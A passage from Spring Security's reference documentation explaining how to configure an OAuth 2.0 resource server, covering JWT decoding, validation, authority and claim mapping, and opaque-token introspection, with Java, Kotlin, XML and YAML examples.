<<oauth2resourceserver-jwt-decoder-builder,the NimbusJwtDecoder builder>>, or from the <<oauth2resourceserver-jwt-decoder-jwk-response,JWK Set response>>.\n\n[[oauth2resourceserver-jwt-boot-algorithm]]\n==== Via Spring Boot\n\nThe simplest way to set the algorithm is as a property:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n jws-algorithm: RS512\n jwk-set-uri: https:\/\/idp.example.org\/.well-known\/jwks.json\n----\n\n[[oauth2resourceserver-jwt-decoder-builder]]\n==== Using a Builder\n\nFor greater power, though, we can use a builder that ships with `NimbusJwtDecoder`:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withJwkSetUri(this.jwkSetUri)\n .jwsAlgorithm(RS512).build();\n}\n----\n\nCalling `jwsAlgorithm` more than once will configure `NimbusJwtDecoder` to trust more than one algorithm, like so:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withJwkSetUri(this.jwkSetUri)\n .jwsAlgorithm(RS512).jwsAlgorithm(EC512).build();\n}\n----\n\nOr, you can call `jwsAlgorithms`:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withJwkSetUri(this.jwkSetUri)\n .jwsAlgorithms(algorithms -> {\n algorithms.add(RS512);\n algorithms.add(EC512);\n }).build();\n}\n----\n\n[[oauth2resourceserver-jwt-decoder-jwk-response]]\n==== From JWK Set response\n\nSince Spring Security's JWT support is based on Nimbus, you can use all of its great features as well.\n\nFor example, Nimbus has a `JWSKeySelector` implementation that will select the set of algorithms based on the JWK Set URI response.\nYou can use it to generate a `NimbusJwtDecoder` like so:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n \/\/ makes a request to the JWK Set endpoint\n JWSKeySelector<SecurityContext> jwsKeySelector =\n JWSAlgorithmFamilyJWSKeySelector.fromJWKSetURL(this.jwkSetUrl);\n\n DefaultJWTProcessor<SecurityContext> jwtProcessor =\n new DefaultJWTProcessor<>();\n jwtProcessor.setJWSKeySelector(jwsKeySelector);\n\n return new NimbusJwtDecoder(jwtProcessor);\n}\n```\n\n[[oauth2resourceserver-jwt-decoder-public-key]]\n=== Trusting a Single Asymmetric Key\n\nSimpler than backing a Resource Server with a JWK Set endpoint is to hard-code an RSA public key.\nThe public key can be provided via <<oauth2resourceserver-jwt-decoder-public-key-boot,Spring Boot>> or by <<oauth2resourceserver-jwt-decoder-public-key-builder,Using a Builder>>.\n\n[[oauth2resourceserver-jwt-decoder-public-key-boot]]\n==== Via Spring Boot\n\nSpecifying a key via Spring Boot is quite simple.\nThe key's location can be specified like so:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n public-key-location: classpath:my-key.pub\n----\n\nOr, to allow for a more sophisticated lookup, you can post-process the `RsaKeyConversionServicePostProcessor`:\n\n[source,java]\n----\n@Bean\nBeanFactoryPostProcessor conversionServiceCustomizer() {\n return beanFactory ->\n beanFactory.getBean(RsaKeyConversionServicePostProcessor.class)\n .setResourceLoader(new CustomResourceLoader());\n}\n----\n\nSpecify your key's location:\n\n```yaml\nkey.location: hdfs:\/\/my-key.pub\n```\n\nAnd then autowire the value:\n\n```java\n@Value(\"${key.location}\")\nRSAPublicKey key;\n```\n\n[[oauth2resourceserver-jwt-decoder-public-key-builder]]\n==== Using a Builder\n\nTo wire an `RSAPublicKey` directly, you can simply use the appropriate `NimbusJwtDecoder` builder, like so:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() 
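\/\/ this.key is an RSAPublicKey, e.g. the @Value-wired field from the previous example\n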
{\n return NimbusJwtDecoder.withPublicKey(this.key).build();\n}\n```\n\n[[oauth2resourceserver-jwt-decoder-secret-key]]\n=== Trusting a Single Symmetric Key\n\nUsing a single symmetric key is also simple.\nYou can simply load in your `SecretKey` and use the appropriate `NimbusJwtDecoder` builder, like so:\n\n[source,java]\n----\n@Bean\npublic JwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withSecretKey(this.key).build();\n}\n----\n\n[[oauth2resourceserver-jwt-authorization]]\n=== Configuring Authorization\n\nA JWT that is issued from an OAuth 2.0 Authorization Server will typically either have a `scope` or `scp` attribute, indicating the scopes (or authorities) it's been granted, for example:\n\n`{ ..., \"scope\" : \"messages contacts\"}`\n\nWhen this is the case, Resource Server will attempt to coerce these scopes into a list of granted authorities, prefixing each scope with the string \"SCOPE_\".\n\nThis means that to protect an endpoint or method with a scope derived from a JWT, the corresponding expressions should include this prefix:\n\n.Authorization Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/contacts\/**\").hasAuthority(\"SCOPE_contacts\")\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_messages\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::jwt);\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredJwkSetUri : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/contacts\/**\", hasAuthority(\"SCOPE_contacts\"))\n authorize(\"\/messages\/**\", hasAuthority(\"SCOPE_messages\"))\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt { }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.org\/.well-known\/jwks.json\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nOr similarly with method security:\n\n[source,java]\n----\n@PreAuthorize(\"hasAuthority('SCOPE_messages')\")\npublic List<Message> getMessages(...) 
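\/\/ body elided; reachable only when the token carries the messages scope\n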
{}\n----\n\n[[oauth2resourceserver-jwt-authorization-extraction]]\n==== Extracting Authorities Manually\n\nHowever, there are a number of circumstances where this default is insufficient.\nFor example, some authorization servers don't use the `scope` attribute, but instead have their own custom attribute.\nOr, at other times, the resource server may need to adapt the attribute or a composition of attributes into internalized authorities.\n\nTo this end, the DSL exposes `jwtAuthenticationConverter()`, which is responsible for converting a `Jwt` into an `Authentication`.\n\nAs part of its configuration, we can supply a subsidiary converter to go from `Jwt` to a `Collection` of granted authorities.\nLet's say that your authorization server communicates authorities in a custom claim called `authorities`.\nIn that case, you can configure the claim that `JwtAuthenticationConverter` should inspect, like so:\n\n.Authorities Claim Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class CustomAuthoritiesClaimName extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwtAuthenticationConverter(jwtAuthenticationConverter())\n )\n );\n }\n}\n\nJwtAuthenticationConverter jwtAuthenticationConverter() {\n JwtGrantedAuthoritiesConverter grantedAuthoritiesConverter = new JwtGrantedAuthoritiesConverter();\n grantedAuthoritiesConverter.setAuthoritiesClaimName(\"authorities\");\n\n JwtAuthenticationConverter jwtAuthenticationConverter = new JwtAuthenticationConverter();\n jwtAuthenticationConverter.setJwtGrantedAuthoritiesConverter(grantedAuthoritiesConverter);\n return jwtAuthenticationConverter;\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.org\/.well-known\/jwks.json\"\n jwt-authentication-converter-ref=\"jwtAuthenticationConverter\"\/>\n <\/oauth2-resource-server>\n<\/http>\n\n<bean id=\"jwtAuthenticationConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtAuthenticationConverter\">\n <property name=\"jwtGrantedAuthoritiesConverter\" ref=\"jwtGrantedAuthoritiesConverter\"\/>\n<\/bean>\n\n<bean id=\"jwtGrantedAuthoritiesConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtGrantedAuthoritiesConverter\">\n <property name=\"authoritiesClaimName\" value=\"authorities\"\/>\n<\/bean>\n----\n====\n\nYou can also configure the authority prefix to be different.\nInstead of prefixing each authority with `SCOPE_`, you can change it to `ROLE_` like so:\n\n.Authorities Prefix Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nJwtAuthenticationConverter jwtAuthenticationConverter() {\n JwtGrantedAuthoritiesConverter grantedAuthoritiesConverter = new JwtGrantedAuthoritiesConverter();\n grantedAuthoritiesConverter.setAuthorityPrefix(\"ROLE_\");\n\n JwtAuthenticationConverter jwtAuthenticationConverter = new JwtAuthenticationConverter();\n jwtAuthenticationConverter.setJwtGrantedAuthoritiesConverter(grantedAuthoritiesConverter);\n return jwtAuthenticationConverter;\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.org\/.well-known\/jwks.json\"\n jwt-authentication-converter-ref=\"jwtAuthenticationConverter\"\/>\n <\/oauth2-resource-server>\n<\/http>\n\n<bean id=\"jwtAuthenticationConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtAuthenticationConverter\">\n <property name=\"jwtGrantedAuthoritiesConverter\" ref=\"jwtGrantedAuthoritiesConverter\"\/>\n<\/bean>\n\n<bean id=\"jwtGrantedAuthoritiesConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtGrantedAuthoritiesConverter\">\n <property name=\"authorityPrefix\" value=\"ROLE_\"\/>\n<\/bean>\n----\n====\n\nOr, you can remove the prefix altogether by calling `JwtGrantedAuthoritiesConverter#setAuthorityPrefix(\"\")`.\n\nFor more flexibility, the DSL supports entirely replacing the converter with any class that implements `Converter<Jwt, AbstractAuthenticationToken>`:\n\n[source,java]\n----\nstatic class CustomAuthenticationConverter implements Converter<Jwt, AbstractAuthenticationToken> {\n public AbstractAuthenticationToken convert(Jwt jwt) {\n return new CustomAuthenticationToken(jwt);\n }\n}\n----
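\n\nSuch a converter can then be wired in through the same `jwtAuthenticationConverter()` DSL method shown above; a minimal sketch:\n\n[source,java]\n----\nhttp\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwtAuthenticationConverter(new CustomAuthenticationConverter())\n )\n );\n----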
\n\n[[oauth2resourceserver-jwt-validation]]\n=== Configuring Validation\n\nUsing <<oauth2resourceserver-jwt-minimalconfiguration,minimal Spring Boot configuration>>, indicating the authorization server's issuer uri, Resource Server will default to verifying the `iss` claim as well as the `exp` and `nbf` timestamp claims.\n\nIn circumstances where validation needs to be customized, Resource Server ships with two standard validators and also accepts custom `OAuth2TokenValidator` instances.\n\n[[oauth2resourceserver-jwt-validation-clockskew]]\n==== Customizing Timestamp Validation\n\nJWTs typically have a window of validity, with the start of the window indicated in the `nbf` claim and the end indicated in the `exp` claim.\n\nHowever, every server can experience clock drift, which can cause tokens to appear expired to one server, but not to another.\nThis can cause some implementation heartburn as the number of collaborating servers increases in a distributed system.\n\nResource Server uses `JwtTimestampValidator` to verify a token's validity window, and it can be configured with a `clockSkew` to alleviate the above problem:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> withClockSkew = new DelegatingOAuth2TokenValidator<>(\n new JwtTimestampValidator(Duration.ofSeconds(60)),\n new JwtIssuerValidator(issuerUri));\n\n jwtDecoder.setJwtValidator(withClockSkew);\n\n return jwtDecoder;\n}\n----\n\n[NOTE]\nBy default, Resource Server configures a clock skew of 30 seconds.\n\n[[oauth2resourceserver-jwt-validation-custom]]\n==== Configuring a Custom Validator\n\nAdding a check for the `aud` claim is simple with the `OAuth2TokenValidator` API:\n\n[source,java]\n----\nOAuth2TokenValidator<Jwt> audienceValidator() {\n return new JwtClaimValidator<List<String>>(AUD, aud -> aud.contains(\"messaging\"));\n}\n----\n\nOr, for more control you can implement your own `OAuth2TokenValidator`:\n\n[source,java]\n----\nstatic class AudienceValidator implements OAuth2TokenValidator<Jwt> {\n OAuth2Error error = new OAuth2Error(\"custom_code\", 
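\/\/ the error code; a human-readable description and an optional error URI follow\n 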
\"Custom error message\", null);\n\n @Override\n public OAuth2TokenValidatorResult validate(Jwt jwt) {\n if (jwt.getAudience().contains(\"messaging\")) {\n return OAuth2TokenValidatorResult.success();\n } else {\n return OAuth2TokenValidatorResult.failure(error);\n }\n }\n}\n\n\/\/ ...\n\nOAuth2TokenValidator<Jwt> audienceValidator() {\n return new AudienceValidator();\n}\n----\n\nThen, to add into a resource server, it's a matter of specifying the `JwtDecoder` instance:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> audienceValidator = audienceValidator();\n OAuth2TokenValidator<Jwt> withIssuer = JwtValidators.createDefaultWithIssuer(issuerUri);\n OAuth2TokenValidator<Jwt> withAudience = new DelegatingOAuth2TokenValidator<>(withIssuer, audienceValidator);\n\n jwtDecoder.setJwtValidator(withAudience);\n\n return jwtDecoder;\n}\n----\n\n[[oauth2resourceserver-jwt-claimsetmapping]]\n=== Configuring Claim Set Mapping\n\nSpring Security uses the https:\/\/bitbucket.org\/connect2id\/nimbus-jose-jwt\/wiki\/Home[Nimbus] library for parsing JWTs and validating their signatures.\nConsequently, Spring Security is subject to Nimbus's interpretation of each field value and how to coerce each into a Java type.\n\nFor example, because Nimbus remains Java 7 compatible, it doesn't use `Instant` to represent timestamp fields.\n\nAnd it's entirely possible to use a different library or for JWT processing, which may make its own coercion decisions that need adjustment.\n\nOr, quite simply, a resource server may want to add or remove claims from a JWT for domain-specific reasons.\n\nFor these purposes, Resource Server supports mapping the JWT claim set with `MappedJwtClaimSetConverter`.\n\n[[oauth2resourceserver-jwt-claimsetmapping-singleclaim]]\n==== Customizing the Conversion of a Single Claim\n\nBy default, `MappedJwtClaimSetConverter` will attempt to coerce claims into the following types:\n\n|============\n| Claim | Java Type\n| `aud` | `Collection<String>`\n| `exp` | `Instant`\n| `iat` | `Instant`\n| `iss` | `String`\n| `jti` | `String`\n| `nbf` | `Instant`\n| `sub` | `String`\n|============\n\nAn individual claim's conversion strategy can be configured using `MappedJwtClaimSetConverter.withDefaults`:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = NimbusJwtDecoder.withJwkSetUri(jwkSetUri).build();\n\n MappedJwtClaimSetConverter converter = MappedJwtClaimSetConverter\n .withDefaults(Collections.singletonMap(\"sub\", this::lookupUserIdBySub));\n jwtDecoder.setClaimSetConverter(converter);\n\n return jwtDecoder;\n}\n```\nThis will keep all the defaults, except it will override the default claim converter for `sub`.\n\n[[oauth2resourceserver-jwt-claimsetmapping-add]]\n==== Adding a Claim\n\n`MappedJwtClaimSetConverter` can also be used to add a custom claim, for example, to adapt to an existing system:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"custom\", custom -> \"value\"));\n```\n\n[[oauth2resourceserver-jwt-claimsetmapping-remove]]\n==== Removing a Claim\n\nAnd removing a claim is also simple, using the same API:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"legacyclaim\", legacy -> null));\n```\n\n[[oauth2resourceserver-jwt-claimsetmapping-rename]]\n==== Renaming a Claim\n\nIn more sophisticated scenarios, like consulting multiple claims at once or renaming a claim, 
Resource Server accepts any class that implements `Converter<Map<String, Object>, Map<String, Object>>`:\n\n```java\npublic class UsernameSubClaimAdapter implements Converter<Map<String, Object>, Map<String, Object>> {\n private final MappedJwtClaimSetConverter delegate =\n MappedJwtClaimSetConverter.withDefaults(Collections.emptyMap());\n\n public Map<String, Object> convert(Map<String, Object> claims) {\n Map<String, Object> convertedClaims = this.delegate.convert(claims);\n\n String username = (String) convertedClaims.get(\"user_name\");\n convertedClaims.put(\"sub\", username);\n\n return convertedClaims;\n }\n}\n```\n\nAnd then, the instance can be supplied as normal:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = NimbusJwtDecoder.withJwkSetUri(jwkSetUri).build();\n jwtDecoder.setClaimSetConverter(new UsernameSubClaimAdapter());\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-jwt-timeouts]]\n=== Configuring Timeouts\n\nBy default, Resource Server uses connection and socket timeouts of 30 seconds each for coordinating with the authorization server.\n\nThis may be too short in some scenarios.\nFurther, it doesn't take into account more sophisticated patterns like back-off and discovery.\n\nTo adjust the way in which Resource Server connects to the authorization server, `NimbusJwtDecoder` accepts an instance of `RestOperations`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder(RestTemplateBuilder builder) {\n RestOperations rest = builder\n .setConnectTimeout(Duration.ofSeconds(60))\n .setReadTimeout(Duration.ofSeconds(60))\n .build();\n\n NimbusJwtDecoder jwtDecoder = NimbusJwtDecoder.withJwkSetUri(jwkSetUri).restOperations(rest).build();\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-opaque-minimalconfiguration]]\n=== Minimal Configuration for Introspection\n\nTypically, an opaque token can be verified via an https:\/\/tools.ietf.org\/html\/rfc7662[OAuth 2.0 Introspection Endpoint], hosted by the authorization server.\nThis can be handy when revocation is a requirement.\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a resource server that uses introspection consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the introspection endpoint details.\n\n[[oauth2resourceserver-opaque-introspectionuri]]\n==== Specifying the Authorization Server\n\nTo specify where the introspection endpoint is, simply do:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n opaque-token:\n introspection-uri: https:\/\/idp.example.com\/introspect\n client-id: client\n client-secret: secret\n----\n\nWhere `https:\/\/idp.example.com\/introspect` is the introspection endpoint hosted by your authorization server and `client-id` and `client-secret` are the credentials needed to hit that endpoint.\n\nResource Server will use these properties to further self-configure and subsequently validate incoming tokens.\n\n[NOTE]\nWhen using introspection, the authorization server's word is the law.\nIf the authorization server responds that the token is valid, then it is.\n\nAnd that's it!\n\n==== Startup Expectations\n\nWhen this property and these dependencies are used, Resource Server will automatically configure itself to validate Opaque Bearer Tokens.\n\nThis startup process is quite a bit simpler than for JWTs since no endpoints need to be discovered and no additional validation rules get added.\n\n==== Runtime Expectations\n\nOnce the application is started up, Resource Server will attempt to process any request containing an `Authorization: Bearer` header:\n\n```http\nGET \/ HTTP\/1.1\nAuthorization: Bearer some-token-value # Resource Server will process this\n```\n\nSo long as this scheme is indicated, Resource Server will attempt to process the request according to the Bearer Token specification.\n\nGiven an Opaque Token, Resource Server will:\n\n1. Query the provided introspection endpoint using the provided credentials and the token\n2. Inspect the response for an `{ 'active' : true }` attribute (a sample response follows below)\n3. Map each scope to an authority with the prefix `SCOPE_`
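\n\nFor reference with step 2, a successful introspection response is a JSON document along these lines (claim names from https:\/\/tools.ietf.org\/html\/rfc7662[RFC 7662]; the exact set of claims varies by authorization server):\n\n[source,json]\n----\n{\n \"active\": true,\n \"scope\": \"messages contacts\",\n \"sub\": \"some-subject\",\n \"exp\": 1585699200\n}\n----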
\n\nThe resulting `Authentication#getPrincipal`, by default, is a Spring Security `{security-api-url}org\/springframework\/security\/oauth2\/core\/OAuth2AuthenticatedPrincipal.html[OAuth2AuthenticatedPrincipal]` object, and `Authentication#getName` maps to the token's `sub` property, if one is present.\n\nFrom here, you may want to jump to:\n\n* <<oauth2resourceserver-opaque-attributes,Looking Up Attributes Post-Authentication>>\n* <<oauth2resourceserver-opaque-authorization-extraction,Extracting Authorities Manually>>\n* <<oauth2resourceserver-opaque-jwt-introspector,Using Introspection with JWTs>>\n\n[[oauth2resourceserver-opaque-attributes]]\n=== Looking Up Attributes Post-Authentication\n\nOnce a token is authenticated, an instance of `BearerTokenAuthentication` is set in the `SecurityContext`.\n\nThis means that it's available in `@Controller` methods when using `@EnableWebMvc` in your configuration:\n\n[source,java]\n----\n@GetMapping(\"\/foo\")\npublic String foo(BearerTokenAuthentication authentication) {\n return authentication.getTokenAttributes().get(\"sub\") + \" is the subject\";\n}\n----\n\nSince `BearerTokenAuthentication` holds an `OAuth2AuthenticatedPrincipal`, that also means that it's available to controller methods, too:\n\n[source,java]\n----\n@GetMapping(\"\/foo\")\npublic String foo(@AuthenticationPrincipal OAuth2AuthenticatedPrincipal principal) {\n return principal.getAttribute(\"sub\") + \" is the subject\";\n}\n----\n\n==== Looking Up Attributes Via SpEL\n\nOf course, this also means that attributes can be accessed via SpEL.\n\nFor example, if using `@EnableGlobalMethodSecurity` so that you can use `@PreAuthorize` annotations, you can do:\n\n```java\n@PreAuthorize(\"principal?.attributes['sub'] == 'foo'\")\npublic String forFoosEyesOnly() {\n return \"foo\";\n}\n```\n\n[[oauth2resourceserver-opaque-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates on Resource Server's behalf.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a resource server.\nWhen using Opaque Tokens, this `WebSecurityConfigurerAdapter` looks like:\n\n.Default Opaque Token Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::opaqueToken);\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\noverride fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken { }\n }\n }\n}\n----\n====\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nReplacing this is as simple as exposing the bean within the application:\n\n.Custom Opaque Token 
Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_message:read\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .opaqueToken(opaqueToken -> opaqueToken\n .introspector(myIntrospector())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"SCOPE_message:read\"))\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken {\n introspector = myIntrospector()\n }\n }\n }\n }\n}\n----\n====\n\nThe above requires the scope of `message:read` for any URL that starts with `\/messages\/`.\n\nMethods on the `oauth2ResourceServer` DSL will also override or replace auto configuration.\n\nFor example, the second `@Bean` Spring Boot creates is an `OpaqueTokenIntrospector`, which introspects `String` tokens into validated instances of `OAuth2AuthenticatedPrincipal`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new NimbusOpaqueTokenIntrospector(introspectionUri, clientId, clientSecret);\n}\n----\n\nIf the application doesn't expose an `OpaqueTokenIntrospector` bean, then Spring Boot will expose the above default one.\n\nAnd its configuration can be overridden using `introspectionUri()` and `introspectionClientCredentials()` or replaced using `introspector()`.\n\nOr, if you're not using Spring Boot at all, then both of these components, the filter chain and an `OpaqueTokenIntrospector`, can be specified in XML.\n\nThe filter chain is specified like so:\n\n.Default Opaque Token Configuration\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<http>\n <intercept-url pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <opaque-token introspector-ref=\"opaqueTokenIntrospector\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nAnd the `OpaqueTokenIntrospector` like so:\n\n.Opaque Token Introspector\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<bean id=\"opaqueTokenIntrospector\"\n class=\"org.springframework.security.oauth2.server.resource.introspection.NimbusOpaqueTokenIntrospector\">\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.opaquetoken.introspection-uri}\"\/>\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.opaquetoken.client-id}\"\/>\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.opaquetoken.client-secret}\"\/>\n<\/bean>\n----\n====\n\n[[oauth2resourceserver-opaque-introspectionuri-dsl]]\n==== Using `introspectionUri()`\n\nAn authorization server's Introspection Uri can be configured <<oauth2resourceserver-opaque-introspectionuri,as a configuration property>> or it can be supplied in the DSL:\n\n.Introspection URI Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredIntrospectionUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .opaqueToken(opaqueToken -> opaqueToken\n 
.introspectionUri(\"https:\/\/idp.example.com\/introspect\")\n .introspectionClientCredentials(\"client\", \"secret\")\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredIntrospectionUri : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken {\n introspectionUri = \"https:\/\/idp.example.com\/introspect\"\n introspectionClientCredentials(\"client\", \"secret\")\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<bean id=\"opaqueTokenIntrospector\"\n class=\"org.springframework.security.oauth2.server.resource.introspection.NimbusOpaqueTokenIntrospector\">\n <constructor-arg value=\"https:\/\/idp.example.com\/introspect\"\/>\n <constructor-arg value=\"client\"\/>\n <constructor-arg value=\"secret\"\/>\n<\/bean>\n----\n====\n\nUsing `introspectionUri()` takes precedence over any configuration property.\n\n[[oauth2resourceserver-opaque-introspector-dsl]]\n==== Using `introspector()`\n\nMore powerful than `introspectionUri()` is `introspector()`, which will completely replace any Boot auto configuration of `OpaqueTokenIntrospector`:\n\n.Introspector Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredIntrospector extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .opaqueToken(opaqueToken -> opaqueToken\n .introspector(myCustomIntrospector())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredIntrospector : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken {\n introspector = myCustomIntrospector()\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <opaque-token introspector-ref=\"myCustomIntrospector\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nThis is handy when deeper configuration, like <<oauth2resourceserver-opaque-authorization-extraction,authority mapping>>, <<oauth2resourceserver-opaque-jwt-introspector,JWT revocation>>, or <<oauth2resourceserver-opaque-timeouts,request timeouts>>, is necessary.\n\n[[oauth2resourceserver-opaque-introspector-bean]]\n==== Exposing a `OpaqueTokenIntrospector` `@Bean`\n\nOr, exposing a `OpaqueTokenIntrospector` `@Bean` has the same effect as `introspector()`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new NimbusOpaqueTokenIntrospector(introspectionUri, clientId, clientSecret);\n}\n----\n\n[[oauth2resourceserver-opaque-authorization]]\n=== Configuring Authorization\n\nAn OAuth 2.0 Introspection endpoint will typically return a `scope` attribute, indicating the scopes (or authorities) it's been granted, for example:\n\n`{ ..., \"scope\" : \"messages contacts\"}`\n\nWhen this is the case, Resource Server will attempt to coerce these scopes into a list of granted authorities, prefixing each scope with the string \"SCOPE_\".\n\nThis means that to protect an endpoint or method with a scope derived from an Opaque Token, the 
